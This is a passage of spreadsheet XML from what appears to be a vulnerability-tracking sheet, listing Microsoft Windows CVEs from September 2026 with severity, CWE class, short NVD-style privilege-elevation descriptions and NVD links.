      <c r="A1356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69335</t>
        </is>
      </c>
      <c r="D1356" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1356" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1356" s="5" t="inlineStr"/>
      <c r="H1356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1356" s="5" t="inlineStr"/>
      <c r="J1356" s="5" t="inlineStr"/>
      <c r="K1356" s="5" t="inlineStr"/>
      <c r="L1356" s="5" t="inlineStr"/>
      <c r="M1356" s="5" t="inlineStr"/>
      <c r="N1356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1356" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1356" s="5" t="inlineStr"/>
      <c r="Q1356" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1356" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t>
        </is>
      </c>
    </row>
    <row r="1357">
      <c r="A1357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69341</t>
        </is>
      </c>
      <c r="D1357" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1357" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1357" s="5" t="inlineStr"/>
      <c r="H1357" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1357" s="5" t="inlineStr"/>
      <c r="J1357" s="5" t="inlineStr"/>
      <c r="K1357" s="5" t="inlineStr"/>
      <c r="L1357" s="5" t="inlineStr"/>
      <c r="M1357" s="5" t="inlineStr"/>
      <c r="N1357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1357" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1357" s="5" t="inlineStr"/>
      <c r="Q1357" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1357" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t>
        </is>
      </c>
    </row>
    <row r="1358">
      <c r="A1358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69362</t>
        </is>
      </c>
      <c r="D1358" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1358" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1358" s="5" t="inlineStr"/>
      <c r="H1358" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1358" s="5" t="inlineStr"/>
      <c r="J1358" s="5" t="inlineStr"/>
      <c r="K1358" s="5" t="inlineStr"/>
      <c r="L1358" s="5" t="inlineStr"/>
      <c r="M1358" s="5" t="inlineStr"/>
      <c r="N1358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1358" s="5" t="inlineStr"/>
      <c r="Q1358" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1358" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t>
        </is>
      </c>
    </row>
    <row r="1359">
      <c r="A1359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69379</t>
        </is>
      </c>
      <c r="D1359" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1359" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1359" s="5" t="inlineStr"/>
      <c r="H1359" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1359" s="5" t="inlineStr"/>
      <c r="J1359" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1359" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1359" s="5" t="inlineStr"/>
      <c r="M1359" s="5" t="inlineStr"/>
      <c r="N1359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1359" s="5" t="inlineStr"/>
      <c r="Q1359" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R1359" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t>
        </is>
      </c>
    </row>
    <row r="1360">
      <c r="A1360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69383</t>
        </is>
      </c>
      <c r="D1360" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1360" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1360" s="5" t="inlineStr"/>
      <c r="H1360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1360" s="5" t="inlineStr"/>
      <c r="J1360" s="5" t="inlineStr"/>
      <c r="K1360" s="5" t="inlineStr"/>
      <c r="L1360" s="5" t="inlineStr"/>
      <c r="M1360" s="5" t="inlineStr"/>
      <c r="N1360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1360" s="5" t="inlineStr"/>
      <c r="Q1360" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R1360" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t>
        </is>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69385</t>
        </is>
      </c>
      <c r="D1361" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1361" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1361" s="5" t="inlineStr"/>
      <c r="H1361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1361" s="5" t="inlineStr"/>
      <c r="J1361" s="5" t="inlineStr"/>
      <c r="K1361" s="5" t="inlineStr"/>
      <c r="L1361" s="5" t="inlineStr"/>
      <c r="M1361" s="5" t="inlineStr"/>
      <c r="N1361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1361" s="5" t="inlineStr"/>
      <c r="Q1361" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1361" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t>
        </is>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69388</t>
        </is>
      </c>
      <c r="D1362" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1362" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1362" s="5" t="inlineStr"/>
      <c r="H1362" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1362" s="5" t="inlineStr"/>
      <c r="J1362" s="5" t="inlineStr"/>
      <c r="K1362" s="5" t="inlineStr"/>
      <c r="L1362" s="5" t="inlineStr"/>
      <c r="M1362" s="5" t="inlineStr"/>
      <c r="N1362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1362" s="5" t="inlineStr"/>
      <c r="Q1362" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1362" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t>
        </is>
      </c>
    </row>
    <row r="1363">
      <c r="A1363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69394</t>
        </is>
      </c>
      <c r="D1363" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1363" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1363" s="5" t="inlineStr"/>
      <c r="H1363" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1363" s="5" t="inlineStr"/>
      <c r="J1363" s="5" t="inlineStr"/>
      <c r="K1363" s="5" t="inlineStr"/>
      <c r="L1363" s="5" t="inlineStr"/>
      <c r="M1363" s="5" t="inlineStr"/>
      <c r="N1363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1363" s="5" t="inlineStr"/>
      <c r="Q1363" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1363" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t>
        </is>
      </c>
    </row>
    <row r="1364">
      <c r="A1364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69398</t>
        </is>
      </c>
      <c r="D1364" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1364" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1364" s="5" t="inlineStr"/>
      <c r="H1364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1364" s="5" t="inlineStr"/>
      <c r="J1364" s="5" t="inlineStr"/>
      <c r="K1364" s="5" t="inlineStr"/>
      <c r="L1364" s="5" t="inlineStr"/>
      <c r="M1364" s="5" t="inlineStr"/>
      <c r="N1364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1364" s="5" t="inlineStr"/>
      <c r="Q1364" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-415</t>
        </is>
      </c>
      <c r="R1364" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t>
        </is>
      </c>
    </row>
    <row r="1365">
      <c r="A1365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69401</t>
        </is>
      </c>
      <c r="D1365" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1365" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1365" s="5" t="inlineStr"/>
      <c r="H1365" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1365" s="5" t="inlineStr"/>
      <c r="J1365" s="5" t="inlineStr"/>
      <c r="K1365" s="5" t="inlineStr"/>
      <c r="L1365" s="5" t="inlineStr"/>
      <c r="M1365" s="5" t="inlineStr"/>
      <c r="N1365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1365" s="5" t="inlineStr"/>
      <c r="Q1365" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1365" s="5" t="inlineStr">
        <is>
          <t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t>
        </is>
      </c>
    </row>
    <row r="1366">
      <c r="A1366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69404</t>
        </is>
      </c>
      <c r="D1366" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1366" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1366" s="5" t="inlineStr"/>
      <c r="H1366" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1366" s="5" t="inlineStr"/>
      <c r="J1366" s="5" t="inlineStr"/>
      <c r="K1366" s="5" t="inlineStr"/>
      <c r="L1366" s="5" t="inlineStr"/>
      <c r="M1366" s="5" t="inlineStr"/>
      <c r="N1366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1366" s="5" t="inlineStr"/>
      <c r="Q1366" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1366" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t>
        </is>
      </c>
    </row>
    <row r="1367">
      <c r="A1367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69410</t>
        </is>
      </c>
      <c r="D1367" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1367" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1367" s="5" t="inlineStr"/>
      <c r="H1367" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1367" s="5" t="inlineStr"/>
      <c r="J1367" s="5" t="inlineStr"/>
      <c r="K1367" s="5" t="inlineStr"/>
      <c r="L1367" s="5" t="inlineStr"/>
      <c r="M1367" s="5" t="inlineStr"/>
      <c r="N1367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1367" s="5" t="inlineStr"/>
      <c r="Q1367" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1367" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t>
        </is>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="D1368" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1368" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1368" s="5" t="inlineStr"/>
      <c r="H1368" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1368" s="5" t="inlineStr"/>
      <c r="J1368" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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8" s="5" t="inlineStr"/>
      <c r="M1368" s="5" t="inlineStr"/>
      <c r="N1368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1368" s="5" t="inlineStr"/>
      <c r="Q1368" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1368" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="1369">
      <c r="A1369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="D1369" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1369" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1369" s="5" t="inlineStr"/>
      <c r="H1369" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1369" s="5" t="inlineStr"/>
      <c r="J1369" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1369" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1369" s="5" t="inlineStr"/>
      <c r="M1369" s="5" t="inlineStr"/>
      <c r="N1369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1369" s="5" t="inlineStr"/>
      <c r="Q1369" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1369" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="1370">
      <c r="A1370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69430</t>
        </is>
      </c>
      <c r="D1370" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1370" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1370" s="5" t="inlineStr"/>
      <c r="H1370" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1370" s="5" t="inlineStr"/>
      <c r="J1370" s="5" t="inlineStr"/>
      <c r="K1370" s="5" t="inlineStr"/>
      <c r="L1370" s="5" t="inlineStr"/>
      <c r="M1370" s="5" t="inlineStr"/>
      <c r="N1370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1370" s="5" t="inlineStr"/>
      <c r="Q1370" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1370" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t>
        </is>
      </c>
    </row>
    <row r="1371">
      <c r="A1371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69440</t>
        </is>
      </c>
      <c r="D1371" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1371" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1371" s="5" t="inlineStr"/>
      <c r="H1371" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1371" s="5" t="inlineStr"/>
      <c r="J1371" s="5" t="inlineStr"/>
      <c r="K1371" s="5" t="inlineStr"/>
      <c r="L1371" s="5" t="inlineStr"/>
      <c r="M1371" s="5" t="inlineStr"/>
      <c r="N1371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1371" s="5" t="inlineStr"/>
      <c r="Q1371" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1371" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S1371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t>
        </is>
      </c>
    </row>
    <row r="1372">
      <c r="A1372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69441</t>
        </is>
      </c>
      <c r="D1372" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1372" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1372" s="5" t="inlineStr"/>
      <c r="H1372" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1372" s="5" t="inlineStr"/>
      <c r="J1372" s="5" t="inlineStr"/>
      <c r="K1372" s="5" t="inlineStr"/>
      <c r="L1372" s="5" t="inlineStr"/>
      <c r="M1372" s="5" t="inlineStr"/>
      <c r="N1372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1372" s="5" t="inlineStr"/>
      <c r="Q1372" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1372" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t>
        </is>
      </c>
    </row>
    <row r="1373">
      <c r="A1373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69448</t>
        </is>
      </c>
      <c r="D1373" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1373" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1373" s="5" t="inlineStr"/>
      <c r="H1373" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1373" s="5" t="inlineStr"/>
      <c r="J1373" s="5" t="inlineStr"/>
      <c r="K1373" s="5" t="inlineStr"/>
      <c r="L1373" s="5" t="inlineStr"/>
      <c r="M1373" s="5" t="inlineStr"/>
      <c r="N1373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1373" s="5" t="inlineStr"/>
      <c r="Q1373" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1373" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t>
        </is>
      </c>
    </row>
    <row r="1374">
      <c r="A1374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69466</t>
        </is>
      </c>
